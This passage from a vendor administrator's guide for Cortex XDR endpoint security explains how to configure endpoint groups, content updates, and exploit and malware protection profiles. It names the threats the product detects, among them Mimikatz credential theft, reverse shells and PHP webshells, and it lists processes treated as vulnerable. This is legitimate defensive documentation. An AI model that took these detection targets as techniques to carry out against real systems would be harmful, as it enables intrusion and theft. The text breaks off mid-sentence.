96 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 3 | Click Next.

STEP 4 | Select the target endpoints (up to 100) for which you want to uninstall the Cortex XDR agent.

If needed, Filter the list of endpoints by attribute or group name.

STEP 5 | Click Next.

STEP 6 | Review the action summary and click Done when finished.

STEP 7 | To track the status of the uninstallation, return to the Action Center.

Set an Alias for an Endpoint

To identify one or more endpoints by a name that is different from the endpoint hostname, you can
configure an alias. You can set an alias for a single endpoint or you can set an alias for multiple endpoints in
bulk. To quickly search for the endpoints during investigation and when you need to take action, you can
use the either the endpoint hostname or the alias.

STEP 1 | Select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Select one or more endpoints.

STEP 3 | Right-click anywhere in the endpoint rows.

STEP 4 | Select Endpoint Control > Change Endpoint Alias.

STEP 5 | Enter the alias name and Update.

If you later change your mind, you can Clear alias of all selected agents from the same menu.

STEP 6 | Use the Quick Launcher to search the endpoints by alias across the Cortex XDR management
console.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 97

© 2020 Palo Alto Networks, Inc.
Define Endpoint Groups
To easily apply policy rules to specific endpoints, you can define an endpoint group. There are two methods
you can use to define an endpoint group:
• Create a dynamic group by allowing Cortex XDR to populate your endpoint group dynamically using
endpoint characteristics such as a partial hostname or alias; full or partial domain or workgroup name; IP
address, range or subnet; installation type (VDI, temporary session, or standard endpoint); agent version;
endpoint type (workstation, server, mobile); or operating system version.
• Create a static group by selecting a list of specific endpoints.
After you define an endpoint group, you can then use it to target policy and actions to specific recipients.
The Endpoint Groups page displays all endpoint groups along with the number of endpoints and policy rules
linked to the endpoint group.
To define an endpoint static or dynamic group:

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Endpoint Groups > +Add
Group.

STEP 2 | Select either Create New to create an endpoint group from scratch or Upload From File,
using plain text files with new line separator, to populate a static endpoint group from a file
containing IP addresses, hostnames, or aliases.

STEP 3 | Enter a Group Name and optional Description to identify the endpoint group. The name you
assign to the group will be visible when you assign endpoint security profiles to endpoints.

STEP 4 | Determine the endpoint properties for creating an endpoint group:

• Dynamic—Use the filters to define the criteria you want to use to dynamically populate an endpoint
group. Dynamic groups support multiple criteria selections and can use AND or OR operators. For
endpoint names and aliases, and domains and workgroups, you can use * to match any string of
characters. As you apply filters, Cortex XDR displays any registered endpoint matches to help you
validate your filter criteria.

Cortex XDR supports only IPv4 addresses.

98 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 • Static—Select specific registered endpoints that you want to include in the endpoint group. Use the
filters, as needed, to reduce the number of results.
When you create a static endpoint group from a file, the IP address, hostname, or alias of the
endpoint must match an existing agent that has registered with Cortex XDR. You can select up to
250 endpoints.

When you disconnect the Directory Sync Service (DSS) in your Cortex XDR
deployment, it might affect existing endpoint groups and policy rules based on Active
Directory properties.

STEP 5 | Create the endpoint group.

After you save your endpoint group, it is ready for use to assign security profiles to endpoints and in
other places where you can use endpoint groups.

STEP 6 | Manage an endpoint group, as needed.

At any time, you can return to the Endpoint Groups page to view and manage your endpoint groups. To
manage a group, right-click the group and select the desired action:
• Edit—View the endpoints that match the group definition, and optionally refine the membership
criteria using filters.
• Delete the endpoint group.
• Save as new—Duplicate the endpoint group and save it as a new group.
• Export group—Export the list of endpoints that match the endpoint group criteria to a tab separated
values (TSV) file.
• View endpoints—Pivot from an endpoint group to a filtered list of endpoints on the Endpoint
Administration page where you can quickly view and initiate actions on the endpoints within the
group.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 99

© 2020 Palo Alto Networks, Inc.
About Content Updates
To increase security coverage and quickly resolve any issues in policy, Palo Alto Networks can seamlessly
deliver software packages for Cortex XDR called content updates. Content updates can contain changes or
updates to any of the following:

Starting with the Cortex XDR 7.1 agent release, Cortex XDR delivers to the agent the
content update in parts and not as a single file, allowing the agent to retrieve only the
updates and additions it needs.

• Default security policy including exploit, malware, restriction, and agent settings profiles
• Default compatibility rules per module
• Protected processes
• Local analysis logic
• Trusted signers
• Processes included in your block list by signers
• Behavioral threat protection rules
• Ransomware module logic including Windows network folders susceptible to ransomware attacks
• Windows Event Logs
• Python scripts provided by Palo Alto Networks
• Python modules supported in script execution
• Maximum file size for hash calculations in File search and destroy
• List of common file types included in File search and destroy
When a new update is available, Cortex XDR notifies the Cortex XDR agent. The Cortex XDR agent then
randomly chooses a time within a six-hour window during which it will retrieve the content update from
Cortex XDR. By staggering the distribution of content updates, Cortex XDR reduces the bandwidth load
and prevents bandwidth saturation due to the high volume and size of the content updates across many
endpoints. You can view the distribution of endpoints by content update version from the Cortex XDR
Dashboard.
To adjust content update distribution for your environment, you can configure the following optional
settings:
• Content distribution bandwidth as part of the Cortex XDR global agent configurations.
• Content download source, as part of the Cortex XDR agent setting profile.
Otherwise, if you want the Cortex XDR agent to retrieve the latest content from the server immediately,
you can force the Cortex XDR agent to connect to the server in one of the following methods:
• (Windows and Mac only) Perform manual check-in from the Cortex XDR agent console.
• Initiate a check-in using the Cytool checkin command.

100 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Endpoint Security Profiles
Cortex XDR provides default security profiles that you can use out of the box to immediately begin
protecting your endpoints from threats. While security rules enable you to block or allow files to run
on your endpoints, security profiles help you customize and reuse settings across different groups of
endpoints. When the Cortex XDR agent detects behavior that matches a rule defined in your security
policy, the Cortex XDR agent applies the security profile that is attached to the rule for further inspection.

Profile Name Description

Exploit Profiles Exploit profiles block attempts to exploit system

flaws in browsers, and in the operating system.
For example, Exploit profiles help protect
against exploit kits, illegal code execution, and
other attempts to exploit process and system
vulnerabilities. Exploit profiles are supported for
Windows, Mac, and Linux platforms.
Add a New Exploit Security Profile.

Malware Profiles Malware profiles protect against the execution

of malware including trojans, viruses, worms,
and grayware. Malware profiles serve two main
purposes: to define how to treat behavior common
with malware, such as ransomware or script-based
attacks, and to define how to treat known malware
and unknown files. Malware profiles are supported
for all platforms.
Add a New Malware Security Profile.

Restrictions Profiles Restrictions profiles limit where executables can

run on an endpoint. For example, you can restrict
files from running from specific local folders or
from removable media. Restrictions profiles are
supported only for Windows platforms.
Add a New Restrictions Security Profile.

Agent Settings Profiles Agent Settings profiles enable you to customize

settings that apply to the Cortex XDR agent (such
as the disk space quota for log retention). For Mac
and Windows platforms, you can also customize
user interface options for the Cortex XDR console,
such as accessibility and notifications.
Add a New Agent Settings Profile.

Exceptions Profiles Exceptions Security Profiles override the security

policy to allow a process or file to run on an
endpoint, to disable a specific BTP rule, to allow
a known digital signer, and to import exceptions
from the Cortex XDR support team. Exceptions

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 101

© 2020 Palo Alto Networks, Inc.
 Profile Name Description
profiles are supported for Windows, Mac, and
Linux platforms.
Add a New Exceptions Security Profile.

After you add the new security profile, you can Manage Security Profiles.

Add a New Exploit Security Profile

Exploit security profiles allow you to configure the action the Cortex XDR agent takes when attempts
to exploit software vulnerabilities or flaws occur. To protect against specific exploit techniques, you can
customize exploit protection capabilities in each Exploit security profile.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each exploit capability supported by the platform. To fine-tune your Exploit security policy, you can
override the configuration of each capability to block the exploit behavior, allow the behavior but report it,
or disable the module.
To define an Exploit security profile:

STEP 1 | Add a new profile.

1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Exploit as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.

1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the action to take when the Cortex XDR agent detects an attempt to exploit each
type of software flaw.
For details on the different exploit protection capabilities, see Endpoint Protection Capabilities.
• Block—Block the exploit attack.
• Report—Allow the exploit activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report exploit attempts.
• Default—Use the default configuration to determine the action to take. Cortex XDR displays the
current default configuration for each capability in parenthesis. For example, Default (Block).
To view which processes are protected by each capability, see Processes Protected by Exploit Security
Policy.
For Logical Exploits Protection, you can also configure a block list for the DLL Hijacking module. The
block list enables you to block specific DLLs when run by a protected process. The DLL folder or file
must include the complete path. To complete the path, you can use environment variables or the asterisk
(*) as a wildcard to match any string of characters (for example, */windows32/).
For Exploit Protection for Additional Processes, you also add one or more additional processes.

102 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 In Exploit Security profiles, if you change the action mode for processes, you must restart
the protected processes for the following security modules to take effect on the process
and its forked processes: Brute Force Protection, Java Deserialization, ROP, and SO
Hijacking.

STEP 4 | Save the changes to your profile.

STEP 5 | Apply Security Profiles to Endpoints.

You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

Processes Protected by Exploit Security Policy

By default, your exploit security profile protects endpoints from attack techniques that target specific
processes. Each exploit protection capability protects a different set of processes that Palo Alto Networks
researchers determine are susceptible to attack. The following tables display the processes that are
protected by each exploit protection capability for each operating system.

Windows Processes Protected by Exploit Security Policy

Browser Exploits Protection

• [updated version of Adobe • flashutil_activex.exe • opera.exe

Flash Player for Firefox • iexplore.exe • plugin-container.exe
installed on endpoint] • microsoftedge.exe • safari.exe
• browser_broker.exe • microsoftedgecp.exe • webkit2webprocess.exe
• chrome.exe • opera_plugin_wrapper.exe
• firefox.exe

Logical Exploits Protection

• cliconfg.exe • excel.exe • powerpnt.exe

• dism.exe • migwiz.exe • sysprep.exe
• dllhost.exe • mmc.exe • winword.exe

Known Vulnerable Processes Protection

• 7z.exe • ipodservice.exe • SLMail.exe

• 7zfm.exe • itunes.exe • soffice.exe
• 7zg.exe • ituneshelper.exe • telnet.exe
• acrobat.exe • journal.exe • unrar.exe
• acrord32.exe • jqs.exe • vboxservice.exe
• acrord32info.exe • microsoft.photos.exe • vboxsvc.exe
• allplayer.exe • msaccess.exe • vboxtray.exe
• applemobiledeviceservice.exe • mspub.exe • video.ui.exe
• apwebgrb.exe • mstsc.exe • visio.exe
• armsvc.exe • nginx.exe • vlc.exe
• blazehdtv.exe • notepad++.exe • vmware-authd.exe
• bsplayer.exe • nslookup.exe • vmware-hostd.exe
• cmd.exe • outlook.exe • vmware-vmx.exe

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 103

© 2020 Palo Alto Networks, Inc.
 Windows Processes Protected by Exploit Security Policy
• eqnedt32.exe • powerpnt.exe • vpreview.exe
• excel.exe • pptview.exe • vprintproxy.exe
• flashfxp.exe • qttask.exe • wab.exe
• fltldr.exe • quicktimeplayer.exe • w3wp.exe
• fontdrvhost.exe • rar.exe • winrar.exe
• foxit reader.exe • reader_sl.exe • winword.exe
• foxitreader.exe • realconverter.exe • wireshark.exe
• groovemonitor.exe • realplay.exe • wmplayer.exe
• hxmail.exe • realsched.exe • wmpnetwk.exe
• i_view32.exe • skype.exe • xpsrchvw.exe
• infopath.exe • skypeapp.exe
• skypehost.exe

Operating System Exploit Protection

• ctfmon.exe • runtimebroker.exe • taskhost.exe

• dllhost.exe • spoolsv.exe • wmiprvse.exe
• dns.exe • svchost.exe • wmiprvse.exe
• lsass.exe • taskeng.exe • wwahost.exe
• msmpeng.exe

Mac Processes Protected by Exploit Security Policy

Browser Exploits Protection

• com.apple.safariservices • firefox • plugin-container

• com.apple.webkit.plugin • firefox-bin • safari
• com.apple.webkit.plugin.64 • google chrome helper • seamonkey
• com.apple.webkit.webcontent • google chrome

Logical Exploits Protection

• adobereader • firefox • pdf reader x

• app drive for google drive • firefox-bin • plugin-container
• app drop for dropbox • google chrome helper • quicktime player
• app for dropbox • google chrome • safari
• app for facebook • itunes helper • seamonkey
• app for google drive • itunes • slack
• app for googledocs • mail+ for yahoo • sonicwall mobile connect
• app for instagram • microsoft excel • textwrangler
• app for linkedin • microsoft outlook • vlc
• app for youtube • microsoft powerpoint • vmware fusion services
• com.apple.safariservices • microsoft remote desktop • vmware fusion
• com.apple.webkit.plugin • microsoft word • vpn shield
• com.apple.webkit.plugin.64 • miniwriterfree • winmail.dat file viewer
• com.apple.webkit.webcontent • parallels client
• document writer • pdf reader pro free

104 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Mac Processes Protected by Exploit Security Policy

Known Vulnerable Processes Protection

• adobereader • document writer • photos

• airmail • itunes helper • photoshop
• app drive for google drive • itunes • quickbooks
• app drop for dropbox • jump desktop • quicktime player
• app for dropbox • mail • signal
• app for facebook • mail+ for yahoo • slack
• app for google drive • messages • sonicwall mobile connect
• app for googledocs • microsoft excel • telegram
• app for instagram • microsoft outlook • textmate
• app for linkedin • microsoft powerpoint • textwrangler
• app for youtube • microsoft remote desktop • thunderbird
• bbedit • microsoft word • vlc
• c-lion • miniwriterfree • vmware fusion services
• cisco anyconnect secure • parallels client • vmware fusion
mobility client • pdf reader pro free • vpn shield
• com.apple.cloudphotosconfiguration
• pdf reader x • winmail.dat file viewer

Linux Processes Protected by Exploit Security Policy

Known Vulnerable Processes Protection

• anacron • mailman • rsyslogd

• apache2 • master • ruby
• authproxy • mongod • samba
• bluetoothd • mysqld • saned
• charon • mysqld_safe • sendmail
• chronyd • named • sendmail.sendmail
• couriertcpd • ndsd • smartd
• cron • nginx • smbd
• crond • nmbd • snmpd
• cupsd • node • squid
• cyrus_pop3d • nscd • squid3
• danted • php • starter
• dhcpd • php5-fpm • syslog-ng
• dovecot • pmmasterd • tinyproxy
• exim • pop2d • vsftpd
• ftpd • pop3d • wickedd-dhcp4
• httpd • postgres • wickedd-dhcp6
• ibserver • proftpd • winbindd
• identd • qmgr • xinetd
• lighttpd • rpcbind
• kamailio • rsync

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 105

© 2020 Palo Alto Networks, Inc.
Add a New Malware Security Profile
Malware security profiles allow you to configure the action Cortex XDR agents take when known malware
and unknown files try to run on Windows, Mac, Linux, and Android endpoints.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each malware protection capability supported by the platform. To fine-tune your Malware security
policy, you can override the configuration of each capability to block the malicious behavior or file, allow
but report it, or disable the module. For each setting you override, clear the option to Use Default.
To configure a Malware security profile:

STEP 1 | Add a new profile.

1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Malware as the profile type.

STEP 2 | Identify the profile.

1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the Cortex XDR agent to examine executable files, macros, or DLL files on Windows
endpoints, Mach-O files or DMG files on Mac endpoints, ELF files on Linux endpoints, or APK
files on Android endpoints.
1. Configure the Action Mode—the behavior of the Cortex XDR agent—when malware is detected:
• Block—Block attempts to run malware.
• Report—Report but do not block malware that attempts to run.
• (Android only) Prompt—Enable the Cortex XDR agent to prompt the user when malware is
detected and allow the user to choose to allow malware, dismiss the notification, or uninstall the
app.
• Disabled—Disable the module and do not examine files for malware.
2. Configure additional actions to examine files for malware.
By default, Cortex XDR uses the settings specified in the default malware security profile and
displays the default configuration in parenthesis. When you select a setting other than the default,
you override the default configuration for the profile.
• (Windows only) Quarantine Malicious Executables—By default, the Cortex XDR agent blocks
malware from running but does not quarantine the file. Enable this option to quarantine files
depending on the verdict issuer (local analysis, WildFire, or both local analysis and WildFire).
Cortex XDR can quarantine only Portable Executables (PEs).
The quarantine feature is not available for malware identified in network drives.
• Upload <file_type> files for cloud analysis—Enable the Cortex XDR agent to send unknown files
to Cortex XDR, and for Cortex XDR to send the files to WildFire for analysis. With macro analysis,
the Cortex XDR agent sends the Microsoft Office file containing the macro. The file types that the
Cortex XDR agent analyzes depend on the platform type. WildFire accepts files up to 100MB in
size.
• Treat Grayware as Malware—Treat all grayware with the same Action Mode you configure for
malware. Otherwise, if this option is disabled, grayware is considered benign and is not blocked.

106 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 • Action on Unknown to WildFire—Select the behavior of the Cortex XDR agent when an unknown
file tries to run on the endpoint (Allow, Run Local Analysis, or Block). With local analysis, the
Cortex XDR agent uses embedded machine learning to determine the likelihood that an unknown
file is malware and issues a local verdict for the file. If you block unknown files but do not run local
analysis, unknown files remain blocked until the Cortex XDR agent receives an official WildFire
verdict.
• (Windows only) Examine Office Files From Network Drives—Enable the Cortex XDR agent to
examine Microsoft Office files in network drives when they contain a macro that attempts to run.
If this option is disabled, the Cortex XDR agent will not examine macros in network drives.

(Windows only) As part of the anti-malware security flow, the Cortex XDR agent
leverages the OS capability to identify revoked certificates for executables and
DLL files that attempt to run on the endpoint by accessing the Windows Certificate
Revocation List (CRL). To allow the Cortex XDR agent access the CRL, you must
enable internet access over port 80 for Windows endpoints running Traps 6.0.3 and
later releases, Traps 6.1.1 and later releases, or Cortex XDR 7.0 and later releases.
If the endpoint is not connected to the internet, or you experience delays with
executables and DLLs running on the endpoint, please contact Palo Alto Networks
Support.
3. (Optional) Add files and folders to your allow list to exclude them from examination.
1. +Add a file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use a wildcard to
match files and folders containing a partial name. Use ? to match a single character or * to match
any string of characters. To match a folder, you must terminate the path with * to match all files in
the folder (for example, c:\temp\*).
3. Repeat to add additional files or folders.
4. Add signers to your allow list to exclude them from examination.
When a file that is signed by a signer you included in your allow list attempts to run,
1. +Add a trusted signer.
2. Enter the name of the trusted signer (Windows) or the SHA1 hash of the certificate that signs
the file (Mac) and press Enter or click the check mark when done. You can also use a wildcard to
match a partial name for the signer. Use ? to match any single character or * to match any string
of characters.
3. Repeat to add additional folders.

STEP 4 | (Windows, Mac, and Linux only) Configure Behavioral Threat Protection.

Behavioral threat protection requires Traps agent 6.0 or a later release for Windows
endpoints, and Traps 6.1 or later versions for Mac and Linux endpoints.

With Behavioral threat protection, the agent continuously monitors endpoint activity to identify and
analyze chains of events—known as causality chains. This enables the agent to detect malicious activity
in the chain that could otherwise appear legitimate if inspected individually. A causality chain can
include any sequence of network, process, file, and registry activities on the endpoint. Behavioral threat
protection can also identify behavior related to vulnerable drivers on Windows endpoints. For more
information on data collection for Behavioral Threat Protection, see Endpoint Data Collected by Cortex
XDR.
Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains
as behavioral threat rules. When the Cortex XDR agent detects a match to a behavioral threat protection
rule, the Cortex XDR agent carries out the configured action (default is Block). In addition, the Cortex
XDR agent reports the behavior of the entire event chain up to the process, known as the causality
group owner (CGO), that the Cortex XDR agent identified as triggering the event sequence.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 107

© 2020 Palo Alto Networks, Inc.
 To configure Behavioral Threat Protection:
1. Define the Action mode to take when the Cortex XDR agent detects malicious causality chains:
• Block (default)—Block all processes and threads in the event chain up to the CGO.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. Define whether to quarantine the CGO when the Cortex XDR agent detects a malicious event chain.
• Enabled—Quarantine the CGO if the file is not signed by a highly trusted signer. When the CGO is
signed by a highly trusted signer or powershell.exe, wscript.exe, cscript.exe, mshta.exe, excel.exe,
word.exe or powerpoint.exe, the Cortex XDR agent parses the command-line arguments and
instead quarantines any scripts or files called by the CGO.
• Disabled (default)—Do not quarantine the CGO of an event chain nor any scripts or files called by
the CGO.
3. (Windows only) Define the Action Mode for Vulnerable Drivers Protection.
Behavioral threat protection rules can also detect attempts to load vulnerable drivers. As with other
rules, Palo Alto Networks threat researchers can deliver changes to vulnerable driver rules with
content updates.
• Block (default)—Block all attempts to run vulnerable drivers.
• Report—Allow vulnerable drivers to run but report the activity.
• Disabled—Disable the module and do not analyze or report the activity.
4. (Optional) Add files that you do not want the Cortex XDR agent to terminate when a malicious
causality chain is detected to your allow list. The allow list does not apply to vulnerable drivers.
1. +Add a file path.
2. Enter the file path you want to exclude from evaluation. Use ? to match a single character or * to
match any string of characters.
3. Click the checkmark to confirm the file path.
4. Repeat the process to add any additional file paths to your allow list.

STEP 5 | (Windows only, requires a Cortex XDR agent 7.3 or a later release) Respond to Malicious Causality
Chains.
When the Cortex XDR agent identifies a remote network connection that attempts to perform malicious
activity—such as encrypt endpoint files—the agent can automatically block the IP address to close all
existing communication, and block new connections from this IP address to the endpoint. When Cortex
XDR blocks an IP address per endpoint, that address remains blocked throughout all agent profiles and
policies, including any host-firewall policy rules. You can view the list of all blocked IP addresses per
endpoint from the Action Center, as well as unblock them to re-enable communication as appropriate.

This capability is supported for network connections made in IPv4 only.

1. Select the Action Mode to take when the Cortex XDR agent detects remote malicious causality
chains:
• Enabled (default)—Terminate connection and block IP address of the remote connection.
• Disabled—Do not block remote IP addresses.
2. To allow specific and known safe IP address or IP address ranges that you do not want the Cortex
XDR to block, add these IP addresses to your allow list.
+Add and then specify the IP address.

STEP 6 | (Windows only) Configure Ransomware Protection.

108 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 1. Define the Action mode to take when the Cortex XDR agent detects ransomware activity locally on
the endpoint or in pre-defined network folders:
• Block (default)—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. Choose whether you want the Cortex XDR agent to Quarantine Malicious Process when
ransomware is detected.
The quarantine option is only available if the Action mode is Block.
3. Configure the ransomware module Protection mode.
By default, the protection mode is set to Normal where the decoy files on the endpoint are present,
but do not interfere with benign applications and end user activity on the endpoint. If you suspect
your network has been infected with ransomware and need to provide better coverage, you can
apply the Aggressive protection mode. The aggressive mode exposes more applications in your
environment to the Cortex XDR agent decoy files, while also increasing the likelihood that benign
software is exposed to decoy files, raising false ransomware alerts, and impairing user experience.
4. Choose whether to enable Cortex XDR to Extend Protection to SMB Shares.
To exclude a specific share or specific folder on a share from ransomware protection, add it to the
allow list. For example, add the share in the format \\fileshare or \\fileshare\subfolder.
You can also use ? to match a single character or * to match any string of characters (for example, \
\fileshare\subfolder\sub*).

STEP 7 | (Windows only) Configure the Cortex XDR agent to Prevent Malicious Child Process Execution.
1. Select the Action Mode to take when the Cortex XDR agent detects malicious child process
execution:
• Block—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
2. To allow specific processes to launch child processes for legitimate purposes, add the child process to
your allow list with optional execution criteria.
+Add and then specify the allow list criteria including the Parent Process Name, Child Process Name,
and Command Line Params. Use ? to match a single character or * to match any string of characters.

If you are adding child process evaluation criteria based on a specific security event,
the event indicates both the source process and the command line parameters in one
line. Copy only the command line parameter for use in the profile.

STEP 8 | (Windows and Mac only) Enable endpoint file scanning.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 109

© 2020 Palo Alto Networks, Inc.
 Periodic scanning enables you to scan endpoints on a reoccurring basis without waiting for malware to
run on the endpoint. To better understand how the agent scans the endpoint, refer to Scan an Endpoint
for Malware.

When periodic scanning is enabled in your profile, the Cortex XDR agent initiates an
initial scan when it is first installed on the endpoint, regardless of the periodic scanning
scheduling time.

1. Configure the Action Mode for the Cortex XDR agent to periodically scan the endpoint for malware:
Enabled to scan at the configured intervals, Disabled (default) if you don’t want the Cortex XDR
agent to scan the endpoint.
2. To configure the scan schedule, set the frequency (Run Weekly or Run Monthly) and day and time at
which the scan will run on the endpoint.
Just as with an on-demand scan, a scheduled scan will resume after a reboot, process interruption, or
operating system crash.
3. (Windows only) To include removable media drives in the scheduled scan, enable the Cortex XDR
agent to Scan Removable Media Drives.
4. Add folders you your allow list to exclude them from examination.
1. Add (+) a folder.
2. Enter the folder path. Use ? to match a single character or * to match any string of characters in
the folder path (for example, C:\*\temp).
3. Press Enter or click the check mark when done.
4. Repeat to add additional folders.

STEP 9 | (Windows Vista and later Windows releases) Enable Password Theft Protection.
Select Enabled to enable the Cortex XDR agent to prevent attacks that use the Mimikatz tool to extract
passwords from memory. When set to Enabled, the Cortex XDR agent silently prevents attempts to steal
credentials (no notifications are provided when these events occur). The Cortex XDR agent enables this

110 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 protection module following the next endpoint reboot. If you don’t want to enable the module, select
Disabled.

This module is supported with Traps agent 5.0.4 and later release.

STEP 10 | (Linux only) Enable Local File Threat Examination.

The Local Threat-Evaluation Engine (LTEE) enables the Cortex XDR agent to detect webshells and
optionally quarantine malicious PHP files on the endpoint.

This module is supported with Cortex XDR agent 7.2.0 and later release.

1. Select the Action Mode to take when the Cortex XDR agent detects the malicious behavior.
• Enable—Enable the Cortex XDR agent to analyze the endpoint for PHP files arriving from the web
server and alert of any malicious PHP scripts.
• Disable—Disable the module and do not analyze or report the activity.
2. Quarantine malicious files.
When Enabled, the Cortex XDR agents quarantine malicious PHP files on the endpoint. The agent
quarantines newly created PHP files only, and does not quarantine updated files.
3. (Optional) Add files and folders to your allow list to exclude them from examination.
1. +Add a file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use * to match
files and folders containing a partial name. To match a folder, you must terminate the path with *
to match all files in the folder (for example, /usr/bin/*).
3. Repeat to add additional files or folders.

STEP 11 | (Linux only) Configure Reverse Shell Protection.

The Reverse Shell Protection module enables the Cortex XDR agent to detect and optionally block
attempts to redirect standard input and output streams to network sockets.
1. Define the Action Mode to take when the Cortex XDR agent detects the malicious behavior.
• Block—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. (Optional) Add processes to your allow list that must redirect streams to network sockets.
1. +Add a connection.
2. Enter the path of the process, and the local and remote IP address and ports.
Use a wildcard to match a partial path name. Use a * to match any string of characters (for
example, */bash). You can also use a * to match any IP address or any port.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 111

© 2020 Palo Alto Networks, Inc.
 3. Press Enter or click the check mark when done.
4. Repeat to add additional folders.

STEP 12 | Save the changes to your profile.

STEP 13 | Apply Security Profiles to Endpoints.

You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

WildFire Analysis Concepts

• File Forwarding
• File Type Analysis
• Verdicts
• Local Verdict Cache
File Forwarding
Cortex XDR sends unknown samples for in-depth analysis to WildFire. WildFire accepts up to 1,000,000
sample uploads per day and up to 1,000,000 verdict queries per day from each Cortex XDR tenant. The
daily limit resets at 23:59:00 UTC. Uploads that exceed the sample limit are queued for analysis after
the limit resets. WildFire also limits sample sizes to 100MB. For more information, see the WildFire
documentation.
For samples that the Cortex XDR agent reports, the agent first checks its local cache of hashes to determine
if it has an existing verdict for that sample. If the Cortex XDR agent does not have a local verdict, the Cortex
XDR agent queries Cortex XDR to determine if WildFire has previously analyzed the sample. If the sample
is identified as malware, it is blocked. If the sample remains unknown after comparing it against existing
WildFire signatures, Cortex XDR forwards the sample for WildFire analysis.
File Type Analysis
The Cortex XDR agent analyzes files based on the type of file, regardless of the file’s extension. For deep
inspection and analysis, you can also configure your Cortex XDR to forward samples to WildFire. A sample
can be:
• Any Portable Executable (PE) file including (but not limited to):
• Executable files
• Object code
• FON (Fonts)
• Microsoft Windows screensaver (.scr) files
• Microsoft Office files containing macros opened in Microsoft Word (winword.exe) and Microsoft Excel
(excel.exe):

112 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 • Microsoft Office 2003 to Office 2016—.doc and .xls
• Microsoft Office 2010 and later releases—.docm, .docx, .xlsm, and .xlsx
• Dynamic-link library file including (but not limited to):
• .dll files
• .ocx files
• Android application package (APK) files
• Mach-o files
• DMG files
• Linux (ELF) files
For information on file-examination settings, see Add a New Malware Security Profile.
Verdicts
WildFire delivers verdicts to identify samples it analyzes as safe, malicious, or unwanted (grayware is
considered obtrusive but not malicious):
• Unknown—Initial verdict for a sample for which WildFire has received but has not analyzed.
• Benign—The sample is safe and does not exhibit malicious behavior.
• Malware—The sample is malware and poses a security threat. Malware can include viruses, worms,
Trojans, Remote Access Tools (RATs), rootkits, botnets, and malicious macros. For files identified as
malware, WildFire generates and distributes a signature to prevent against future exposure to the threat.
• Grayware—The sample does not pose a direct security threat, but might display otherwise obtrusive
behavior. Grayware typically includes adware, spyware, and Browser Helper Objects (BHOs).
When WildFire is not available or integration is disabled, the Cortex XDR agent can also assign a local
verdict for the sample using additional methods of evaluation: When the Cortex XDR agent performs local
analysis on a file, it uses pattern-matching rules and machine learning to determine the verdict. The Cortex
XDR agent can also compare the signer of a file with a local list of trusted signers to determine whether a
file is malicious:
• Local analysis verdicts:
• Benign—Local analysis determined the sample is safe and does not exhibit malicious behavior.
• Malware—The sample is malware and poses a security threat. Malware can include viruses, worms,
Trojans, Remote Access Tools (RATs), rootkits, botnets, and malicious macros.
• Trusted signer verdicts:
• Trusted—The sample is signed by a trusted signer.
• Not Trusted—The sample is not signed by a trusted signer.
Local Verdict Cache
The Cortex XDR agent stores hashes and the corresponding verdicts for all files that attempt to run on the
endpoint inits local cache. The local cache scales in size to accommodate the number of unique executable
files opened on the endpoint. On Windows endpoints, the cache is stored in the C:\ProgramData
\Cyvera\LocalSystem folder on the endpoint. When service protection is enabled (see Add a New
